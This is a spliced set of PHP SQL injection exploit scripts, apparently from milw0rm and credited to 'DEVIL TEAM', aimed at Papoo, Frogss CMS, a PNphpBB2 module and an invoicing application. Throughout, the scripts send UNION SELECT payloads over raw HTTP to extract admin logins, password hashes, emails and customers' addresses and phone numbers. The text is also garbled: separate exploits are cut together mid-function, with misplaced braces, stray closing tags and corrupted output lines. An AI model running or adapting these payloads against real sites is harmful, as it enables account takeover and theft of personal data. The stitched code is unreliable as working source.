if ($prefix == "") {
$packet = "GET " . $p . "kontakt.php?menuid=-1)+ HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
if (strstr($html, "You have an error in your SQL syntax")) {
$temp = explode("_papoo_collum3", $html);
$temp2 = explode("SELECT article FROM ", $temp[0]);
$prefix = $temp2[count($temp2) - 1];
echo "prefix: " . $prefix . "\n";
} else {
die("Unable to disclose table prefix...\n");
}
}
print "Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit by Kacper\r\n";
$packet = "GET " . $p . "kontakt.php?menuid=-1)+union+select+CONCAT(" . char_convert("<!--[#") . ",username,CHAR(58),password," . char_convert("#]-->") . ")+from+" . $prefix . "_papoo_user+WHERE+userid=" . $userid . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "kontakt.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$temp = explode('<!--[#', $html);
$temp2 = explode('#]-->', $temp[1]);
for ($i = 1; $i <= count($temp) - 1; $i++) {
$temp2 = explode(":", $temp[$i]);
if (sprawdz($temp2[1])) {
echo "admin => " . $temp2[0] . "\n";
echo "password (md5) => " . $temp2[1] . "\n";
}
print "Prefix -> " . $prefix . "\r\n";
print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
$packet = "GET " . $p . "index.php?name=PNphpBB2&file=index&c=1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",user_password," . char_convert("]-Kacper>") . "),2,3,4/**/FROM/**/" . $prefix . "_phpbb_users/**/WHERE/**/user_id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$pass = $t2[0];
echo "Admin Password: "******"\r\n";
$packet = "GET " . $p . "index.php?name=PNphpBB2&file=index&c=1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",username," . char_convert("]-Kacper>") . "),2,3,4/**/FROM/**/" . $prefix . "_phpbb_users/**/WHERE/**/user_id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "category.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$nick = $t2[0];
echo "Admin Username: "******"\r\n";
if ($pass == "") {
echo "exploit failed, check prefix !!!!!!!!!! (index.php?name=PNphpBB2&file=index&c='1)\r\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
}
}
return $encoded;
}
print "++++++++++++++++++++++ START ++++++++++++++++++++\r\n";
$packet = "GET " . $p . "index.php?m=articles&ms=print&article_id=99999999'+union+select+0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",user_password," . char_convert("]-Kacper>") . "),2,3,4,5,6,7+from+" . $prefix . "users+where+user_id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$pass = $t2[0];
$packet = "GET " . $p . "index.php?m=articles&ms=print&article_id=99999999'+union+select+0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",user_name," . char_convert("]-Kacper>") . "),2,3,4,5,6,7+from+" . $prefix . "users+where+user_id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$nick = $t2[0];
echo "User Name: " . $nick . "\r\n";
echo "User Password: "******"\r\n";
print "++++++++++++++++++++++ DONE ++++++++++++++++++++\r\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
echo "DEVIL TEAM HOME: http://devilteam.eu/\r\n";
return $encoded;
}
print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
$packet = "GET " . $p . "category.php?id_category=-1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<!--[") . ",pass," . char_convert("]-->") . "),2,3/**/FROM/**/" . $prefix . "Accounts/**/WHERE/**/level=3/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "category.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<!--[", $html);
$t2 = explode("]-->", $t[1]);
$pass = $t2[0];
echo "Admin Password: "******"\r\n";
$packet = "GET " . $p . "category.php?id_category=-1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<!--[") . ",email," . char_convert("]-->") . "),2,3/**/FROM/**/" . $prefix . "Accounts/**/WHERE/**/level=3/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "category.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<!--[", $html);
$t2 = explode("]-->", $t[1]);
$email = $t2[0];
echo "Admin E-Mail: " . $email . "\r\n";
?>
# milw0rm.com [2007-05-24]
print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
print "Frogss CMS <= 0.7 SQL Injection Exploit by Kacper\r\n";
print "Vulnerabilities Number: 3\r\n";
$packet = "GET " . $p . "forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(" . char_convert("<!--[") . ",haslo," . char_convert("]-->") . "),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "forum/viewtopic.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<!--[", $html);
$t2 = explode("]-->", $t[1]);
$pass = $t2[0];
echo "Admin Password: "******"\r\n";
$packet = "GET " . $p . "forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(" . char_convert("<!--[") . ",login," . char_convert("]-->") . "),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "forum/viewtopic.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<!--[", $html);
$t2 = explode("]-->", $t[1]);
$login = $t2[0];
echo "Admin Login: "******"\r\n";
}
?>
# milw0rm.com [2007-04-13]
}
function char_convert($my_string)
{
$encoded = "CHAR(";
for ($k = 0; $k <= strlen($my_string) - 1; $k++) {
$encoded .= ord($my_string[$k]);
if ($k == strlen($my_string) - 1) {
$encoded .= ")";
} else {
$encoded .= ",";
}
}
return $encoded;
}
print "++++++++++++++++++++++ START ++++++++++++++++++++\r\n";
$packet = "GET " . $p . "index.php?module=invoices&view=email&stage=1&submit=-1/*+DEVIL+TEAM+*/union/*+devilteam.eu+*/select/*+POLISH+TEAM+*/CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",name," . char_convert(":") . ",street_address," . char_convert(":") . ",street_address2," . char_convert(":") . ",city," . char_convert(":") . ",state," . char_convert(":") . ",country," . char_convert(":") . ",phone," . char_convert(":") . ",mobile_phone," . char_convert(":") . ",email," . char_convert("]-Kacper>") . "),1,2,3,4,5,6,7,8,9,10/**/FROM/*table=>*/si_customers/*+and+*/WHERE/*+user+ID+*/id=" . $user_id . "/* HTTP/1.0\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: pl\r\n";
$packet .= "User-Agent: Googlebot/2.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t = explode("<DEVIL_TEAM-[", $html);
$t2 = explode("]-Kacper>", $t[1]);
$calosc = $t2[0];
$dane = explode(":", $calosc);
echo "Customer Name: " . $dane[0] . "\r\n";
echo "Customer Street: " . $dane[1] . "\r\n";
echo "Customer Street address 2: " . $dane[2] . "\r\n";
echo "Customer City: " . $dane[3] . "\r\n";
